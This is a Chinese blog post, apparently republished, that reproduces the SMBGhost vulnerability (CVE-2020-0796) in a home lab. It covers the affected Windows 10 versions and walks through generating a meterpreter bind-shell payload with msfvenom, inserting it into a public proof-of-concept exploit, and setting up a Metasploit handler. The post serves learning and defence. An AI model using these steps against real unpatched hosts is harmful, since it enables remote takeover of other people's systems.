漏洞复现CVE-2020-0796

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 漏洞复现CVE-2020-0796,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

CVE-2020-0796-简介

漏洞名称

SMB远程代码执行漏洞(CVE-2020-0796),有安全研究者取名“SMBGhost”。

漏洞类型

远程代码执行

漏洞等级

高危

漏洞描述

微软3月11日发布3月例行更新,其中并未公布编号为CVE-2020-0796的高危漏洞资料,但该漏洞却最为引人注目。次日晚(2020年3月12日)微软正式发布CVE-2020-0796高危漏洞补丁。

SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。

攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。

该漏洞并未出现在微软3月的例行更新列表,有国外安全厂商意外发布了有关该漏洞存在的消息,随后引发行业关注。

漏洞版本

漏洞不影响win7,漏洞影响Windows 10 1903之后的各个32位、64位版Windows,包括家用版、专业版、企业版、教育版。

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

漏洞复现

准备环境

去msdn下载镜像然后安装系统,由于电脑配置有限,这里我采用NAT,启用一台win10和一台kali,扫描者与受害者都是win10

漏洞复现CVE-2020-0796

发现漏洞

通过奇安信的漏洞检测脚本发现存在漏洞:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

解压后可通过附带的文本文件了解软件的使用方式以及漏洞的修复方式,这里直接探测到,148(就是自己)存在相关漏洞

漏洞复现CVE-2020-0796

修改exp

通过 MSF 生成 shellcode:(用正向)

msfvenom -p windows/x64/meterpreter/bind_tcp lport=9999 -f py -o shellcode.txt
漏洞复现CVE-2020-0796

下载 exp 脚本:

https://github.com/chompie1337/SMBGhost_RCE_PoC.git

把刚刚 MSF 生成的 shellcode.txt 里的 buf 替换成 USER_PAYLOAD

漏洞复现CVE-2020-0796

这个时候解压打开下载下来的exp脚本,打开exploit.py,你会发现这个py文件分为上下两大部分,这个时候把修改过的shellcode.txt的内容替换掉py文件下面那堆文件


【这点也是我最想吐槽的,没怎么见有人说,一直迷惑shellcode.txt怎么跟exploit.py文件搞到一块的,查了半天资料才知道。说人话就是:使用MSF生成一段恶意代码,把这段恶意代码的每行开头的buf替换为USER_PAYLOAD,然后把这段修改过的恶意代码,去替换EXP文件中exploit.py中的,USER_PAYLOAD开头的那堆代码】

漏洞复现CVE-2020-0796

MSf监听

这个时候 MSF 就可以启动监听了

msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 9999
set rhost 192.168.40.148
exploit

漏洞复现CVE-2020-0796

开打

如果打一次,MSF没收到会话,就拿python再打一次,有可能能够拿到会话,也有可能win10蓝屏。我的是win10蓝屏,msf没有拿到会话

漏洞复现CVE-2020-0796
漏洞复现CVE-2020-0796
漏洞复现CVE-2020-0796

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134349.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!